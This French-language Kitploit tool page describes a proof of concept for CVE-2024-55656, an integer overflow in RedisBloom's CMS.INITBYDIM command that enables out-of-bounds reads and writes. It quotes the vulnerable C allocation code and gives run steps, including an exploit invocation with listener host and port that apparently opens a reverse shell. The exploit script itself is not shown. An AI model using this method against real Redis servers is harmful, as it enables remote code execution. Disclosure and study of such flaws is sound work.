Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
redis-stack-CVE-2024-55656 | Kitploit
Outils/GitHubGitHub/rick2600/redis-stack-cve-2024-55656
Criminalistique MémoireAnalyse des VulnérabilitésExploitationTests d'IntrusionSécurité des Bases de DonnéesExploitation de Binaires
GitHubrick2600/redis-stack-cve-2024-55656

redis-stack-CVE-2024-55656

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-55656 - Redis Stack - Vulnérabilité d'exécution de code à distance par dépassement d'entier dans RedisBloom

  • Titre : Vulnérabilité d'exécution de code à distance par dépassement d'entier dans Redis Stack RedisBloom
  • ZDI : ZDI-25-009
  • CVE : CVE-2024-55656
  • Crédits : rick2600 et gqsilva
  • CVSS : 8.8 (ÉLEVÉ)
  • Version affectée : RedisBloom v2.6.12 fournie avec Redis Stack 7.2.0-v10

Analyse (version courte)

Il existe une vulnérabilité de dépassement d'entier dans RedisBloom (https://github.com/RedisBloom/RedisBloom), un module utilisé dans Redis (https://redis.io/docs/latest/develop/data-types/probabilistic/bloom-filter/). Cette vulnérabilité de dépassement d'entier permet à un attaquant (un client Redis qui connaît le mot de passe) d'allouer dans le tas une quantité de mémoire inférieure à celle requise, en raison d'un enroulement. Ensuite, des lectures et des écritures peuvent être effectuées au-delà de cette mémoire allouée, entraînant une fuite d'informations et une écriture hors limites.

Le dépassement d'entier se trouve dans la commande CMS.INITBYDIM, qui initialise un Count-Min Sketch à des dimensions spécifiées par l'utilisateur. Elle accepte deux valeurs (width et depth) et les utilise pour allouer de la mémoire dans NewCMSketch().

Fichier : src/cms.c

root@kitploit:~
CMSketch *NewCMSketch(size_t width, size_t depth) {
    assert(width > 0);
    assert(depth > 0);

    CMSketch *cms = CMS_CALLOC(1, sizeof(CMSketch));

    cms->width = width;
    cms->depth = depth;
    cms->counter = 0;
    cms->array = CMS_CALLOC(width * depth, sizeof(uint32_t));

    return cms;
}

La lecture hors limites est réalisée via la commande CMS.QUERY implémentée dans CMS_Query().

L'écriture hors limites est réalisée via la commande CMS.INCRBY implémentée dans CMS_IncrBy().

Pour une analyse complète, consultez l'avis de sécurité

Preuve de concept

  1. Démarrez redis-stack

docker run -p 6379:6379 --name redis-stack redis/redis-stack:7.2.0-v10

  1. Exécutez l'exploit

python exploit.py --host 172.17.0.2 --port 6379 --lhost 172.17.0.1 --lport 4444

Références

  1. https://www.zerodayinitiative.com/advisories/ZDI-25-009/
  2. https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h
  3. https://redis.io/blog/security-advisory-cve-2024-46981-cve-2024-51737-cve-2024-51480-cve-2024-55656/
Télécharger l’outil